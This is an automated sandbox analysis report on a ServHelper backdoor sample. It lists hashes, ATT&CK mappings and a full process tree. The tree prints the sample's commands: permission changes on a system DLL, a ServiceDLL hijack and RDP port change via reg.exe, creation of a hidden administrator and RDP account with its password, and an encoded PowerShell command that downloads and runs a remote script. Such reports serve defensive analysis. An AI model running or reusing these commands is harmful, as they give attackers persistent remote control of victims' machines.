servhelper | 08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12

Analysis

max time kernel
131s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 09:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
Size

4.5MB
MD5

2519d825ce34edc5881380dfe1a2f9c4
SHA1

642d87e38007682e8c60265ee59e67b09c32eb16
SHA256

08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12
SHA512

e4dfe0e8f3100824bd74942f4b97d39812055a572a1050ce8b18d0485c3f4bc42eb06c220ad4b145c055af7184ea31ca0274fcb029485f3cf90c8e81613c1ddd
SSDEEP

49152:E8CdRhKHG/xe5R7w0XQ5lh6aoBaD8NB+uLqXnVMlONTKFMc8XQDmDzE8k/9U1:E8eKHGJG

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2392	powershell.exe
6	2392	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
2552	icacls.exe
2748	icacls.exe
1144	icacls.exe
768	icacls.exe
2132	icacls.exe
2932	icacls.exe
3000	icacls.exe
2044	takeown.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
1096	Process not Found
1096	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
768	icacls.exe
2132	icacls.exe
2932	icacls.exe
3000	icacls.exe
2044	takeown.exe
2552	icacls.exe
2748	icacls.exe
1144	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000b000000015cb9-102.dat	upx
behavioral1/files/0x000f00000000f680-103.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
4	raw.githubusercontent.com
5	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LH1B7SRS3XJQP4WCFAHP.temp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2648	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 50502275298bda01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1436	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2944	powershell.exe
1776	powershell.exe
2800	powershell.exe
2432	powershell.exe
2944	powershell.exe
2944	powershell.exe
2944	powershell.exe
2392	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

pid	Process
464	Process not Found
1096	Process not Found
1096	Process not Found
1096	Process not Found
1096	Process not Found

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeRestorePrivilege	2748	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2648	WMIC.exe
Token: SeAuditPrivilege	2648	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2648	WMIC.exe
Token: SeAuditPrivilege	2648	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2544	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2544	WMIC.exe
Token: SeAuditPrivilege	2544	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2544	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2544	WMIC.exe
Token: SeAuditPrivilege	2544	WMIC.exe
Token: SeDebugPrivilege	2392	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2876 wrote to memory of 2944	2876	08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe	28
PID 2876 wrote to memory of 2944	2876	08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe	28
PID 2876 wrote to memory of 2944	2876	08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe	28
PID 2944 wrote to memory of 2596	2944	powershell.exe	30
PID 2944 wrote to memory of 2596	2944	powershell.exe	30
PID 2944 wrote to memory of 2596	2944	powershell.exe	30
PID 2596 wrote to memory of 2620	2596	csc.exe	31
PID 2596 wrote to memory of 2620	2596	csc.exe	31
PID 2596 wrote to memory of 2620	2596	csc.exe	31
PID 2944 wrote to memory of 1776	2944	powershell.exe	32
PID 2944 wrote to memory of 1776	2944	powershell.exe	32
PID 2944 wrote to memory of 1776	2944	powershell.exe	32
PID 2944 wrote to memory of 2800	2944	powershell.exe	34
PID 2944 wrote to memory of 2800	2944	powershell.exe	34
PID 2944 wrote to memory of 2800	2944	powershell.exe	34
PID 2944 wrote to memory of 2432	2944	powershell.exe	36
PID 2944 wrote to memory of 2432	2944	powershell.exe	36
PID 2944 wrote to memory of 2432	2944	powershell.exe	36
PID 2944 wrote to memory of 2044	2944	powershell.exe	41
PID 2944 wrote to memory of 2044	2944	powershell.exe	41
PID 2944 wrote to memory of 2044	2944	powershell.exe	41
PID 2944 wrote to memory of 2552	2944	powershell.exe	42
PID 2944 wrote to memory of 2552	2944	powershell.exe	42
PID 2944 wrote to memory of 2552	2944	powershell.exe	42
PID 2944 wrote to memory of 2748	2944	powershell.exe	43
PID 2944 wrote to memory of 2748	2944	powershell.exe	43
PID 2944 wrote to memory of 2748	2944	powershell.exe	43
PID 2944 wrote to memory of 1144	2944	powershell.exe	44
PID 2944 wrote to memory of 1144	2944	powershell.exe	44
PID 2944 wrote to memory of 1144	2944	powershell.exe	44
PID 2944 wrote to memory of 768	2944	powershell.exe	45
PID 2944 wrote to memory of 768	2944	powershell.exe	45
PID 2944 wrote to memory of 768	2944	powershell.exe	45
PID 2944 wrote to memory of 2132	2944	powershell.exe	46
PID 2944 wrote to memory of 2132	2944	powershell.exe	46
PID 2944 wrote to memory of 2132	2944	powershell.exe	46
PID 2944 wrote to memory of 2932	2944	powershell.exe	47
PID 2944 wrote to memory of 2932	2944	powershell.exe	47
PID 2944 wrote to memory of 2932	2944	powershell.exe	47
PID 2944 wrote to memory of 3000	2944	powershell.exe	48
PID 2944 wrote to memory of 3000	2944	powershell.exe	48
PID 2944 wrote to memory of 3000	2944	powershell.exe	48
PID 2944 wrote to memory of 672	2944	powershell.exe	49
PID 2944 wrote to memory of 672	2944	powershell.exe	49
PID 2944 wrote to memory of 672	2944	powershell.exe	49
PID 2944 wrote to memory of 1436	2944	powershell.exe	50
PID 2944 wrote to memory of 1436	2944	powershell.exe	50
PID 2944 wrote to memory of 1436	2944	powershell.exe	50
PID 2944 wrote to memory of 2916	2944	powershell.exe	51
PID 2944 wrote to memory of 2916	2944	powershell.exe	51
PID 2944 wrote to memory of 2916	2944	powershell.exe	51
PID 2944 wrote to memory of 1672	2944	powershell.exe	52
PID 2944 wrote to memory of 1672	2944	powershell.exe	52
PID 2944 wrote to memory of 1672	2944	powershell.exe	52
PID 1672 wrote to memory of 1844	1672	net.exe	53
PID 1672 wrote to memory of 1844	1672	net.exe	53
PID 1672 wrote to memory of 1844	1672	net.exe	53
PID 2944 wrote to memory of 684	2944	powershell.exe	54
PID 2944 wrote to memory of 684	2944	powershell.exe	54
PID 2944 wrote to memory of 684	2944	powershell.exe	54
PID 684 wrote to memory of 1740	684	cmd.exe	55
PID 684 wrote to memory of 1740	684	cmd.exe	55
PID 684 wrote to memory of 1740	684	cmd.exe	55
PID 1740 wrote to memory of 2304	1740	cmd.exe	56

C:\Users\Admin\AppData\Local\Temp\08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
"C:\Users\Admin\AppData\Local\Temp\08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nuammij7.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA620.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA61F.tmp"
      4⤵
      PID:2620
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2044
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2552
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1144
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:768
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2132
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2932
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3000
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:672
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1436
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2916
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1844
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:684
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1740
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:2304
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1084
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:1072
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:2264
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:1088
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2688
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2680

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:544
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:1920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:368

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc kf5EhqIO /add
1⤵
PID:2004
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc kf5EhqIO /add
  2⤵
  PID:2168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc kf5EhqIO /add
    3⤵
    PID:1480

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:688
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:2192
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2088

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
1⤵
PID:1496
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
  2⤵
  PID:532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
    3⤵
    PID:1732

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1208
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2704

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc kf5EhqIO
1⤵
PID:2700
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc kf5EhqIO
  2⤵
  PID:860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc kf5EhqIO
    3⤵
    PID:2584

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1304
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2648

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2600
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2544

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2412
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA620.tmp

Filesize
1KB

MD5
fe8607e4acef163a7af33ef50e858ebe

SHA1
5670fefcc2dda9d851fc1467c78725646cba3def

SHA256
9f5c280a66f2a52d2bff754f8bddefeedbd4489f09bc7e36f6321103f665f5f5

SHA512
dae2d5f70bcf44484fe1849b0c8f20d59282a807aa8bc24de4012d42950970bef42aa3a0c59cd6ed97f1794c273bbef17a1516642efe3e3e5fe607a83b17f27a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nuammij7.dll

Filesize
3KB

MD5
d7d30ef5d557b3634991b98f0f2e6799

SHA1
6a27580b1dfd1165b84d56db82c9b79ced7ecdb0

SHA256
dca17a82158edebaa7b5460cb3b01a0b6c6c19722709a868e720a65c892d71b9

SHA512
bb1c0d58b2feaec6ef30e5da38b2e9049659babae4f78bedea81bc19396605e5b52a03e944d75f940223b5b417832c18ef7419e7c1c512cd5159bec14ce58555

Download Submit
C:\Users\Admin\AppData\Local\Temp\nuammij7.pdb

Filesize
7KB

MD5
3a768a5d2008af50b1e774486557df6d

SHA1
fb7595570a2099436d2fe1af6558fdc2c0e8c622

SHA256
dedf3719c8dd9092cf7ba8662ab408c214c7a8a7bba4ba367eacce501e3a8e43

SHA512
7f20d5dca4c97c5bc074a09cade920fee79edb996b2df21abc21779b305dbaa88fb8a142584c9b6096d6df31a9dc3cfbeff41b6ede2fe159ae4561115953649e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
1c42eeda1f1bcf1b607aae8a13af258a

SHA1
3ceae3bbf209e777069cad37f0073c00564b7060

SHA256
300199ee623af4efb07d6904e943bb1807f9e58efb6cae448630aa3c16e4fb75

SHA512
5579df57fcbb7a4958cb2630e9d4fe7cbbd10821182227e1a64c522c98e254135720f26eda05c2e9c5959b40fed480e90aa10ba47be602d8c843ac965d8a0853

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1c7a5126d4a381a1fd68b03b409a593d

SHA1
c4a3fe4706f65965c32a5567b6ff0d7edafa4c8d

SHA256
da3f4038acf98d471479767ecfab12cad6e6ba9fa4c556952e1dad08c0b22b34

SHA512
fc6d12c9882641c2f61c1e175e18e62440a9aad5d2ac94f852d57fe954495e152b904e00b7edcd2f8cdc7c9339e56da515557f53473314b07a55d508ae06802e

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA61F.tmp

Filesize
652B

MD5
e52eaf3d44771689b97107bd76e29ea1

SHA1
31c76c47c0e062003e138054c5582b01697f6b29

SHA256
a9a91ca01388530c4a388825384222ed12d3b9c1dfd4ab1359fb7d71bffb9174

SHA512
b5ab2006c385d9a55579fbab6f452d705fdc4768d3c819af0d906a9931aa85d26ffeee3ee0d4fa363986b0587cd53796e27978adcf845bef6f9129e1c7158d47

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nuammij7.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nuammij7.cmdline

Filesize
309B

MD5
02498c2f9aee064e047887636fb0d9c3

SHA1
5ca402755e0e83c7588c4e1842976486d992fad7

SHA256
cb905a5af5728fda626a6b2f94ae2b611260413e812beb42ae796d3742142284

SHA512
089dda35315f52f245adce77357174e5623ed3a1c9bda6a3e42cf9d1f771fdb85b62335d2c39b400985f38597853b02d0e635a93c9729c031967a35a4b0a6471

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
5e1182125ef143f791788d0dc4bf3e9b

SHA1
dfb1e962e91de4a90ebe27d454801ac182e15106

SHA256
a3355f5763c1189c54710459c0bb09182491544dc087f301827669947b951b10

SHA512
e4db09adcc2c7ce86a8a6cea4fc1522ef6d17466e468137bac6e86849b10839bf0a5a77469fa135f41a1885471433d33d18113c0c23daa604f2e84330e9ad3ea

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
6d38a0137dd439eb26f8f19d2bb50b83

SHA1
392ae467b6e5c796669a746d67924529241e51cf

SHA256
60fc94385520b4353ddc0d9fda9698f4f61ff74abaf794525b9828f8bc24ed0a

SHA512
31141bb3943202b0081078312b3551e0b931520e8dd3661fa75075d016c7d6ad9c9f6e259c555ca4b52e8e7a7344bffbdf65ba0e4f897ecbcf625c3bb09b40b7

Download Submit
memory/1776-51-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/1776-46-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

Filesize
9.6MB

Download
memory/1776-47-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/1776-48-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

Filesize
9.6MB

Download
memory/1776-49-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/1776-53-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

Filesize
9.6MB

Download
memory/1776-50-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/2392-111-0x0000000001030000-0x00000000010B0000-memory.dmp

Filesize
512KB

Download
memory/2392-116-0x0000000001030000-0x00000000010B0000-memory.dmp

Filesize
512KB

Download
memory/2392-115-0x0000000001030000-0x00000000010B0000-memory.dmp

Filesize
512KB

Download
memory/2392-114-0x0000000001030000-0x00000000010B0000-memory.dmp

Filesize
512KB

Download
memory/2392-113-0x0000000001030000-0x00000000010B0000-memory.dmp

Filesize
512KB

Download
memory/2392-112-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

Filesize
9.6MB

Download
memory/2392-117-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

Filesize
9.6MB

Download
memory/2392-110-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

Filesize
9.6MB

Download
memory/2432-82-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/2432-76-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

Filesize
9.6MB

Download
memory/2432-84-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

Filesize
9.6MB

Download
memory/2432-81-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/2432-83-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/2432-79-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

Filesize
9.6MB

Download
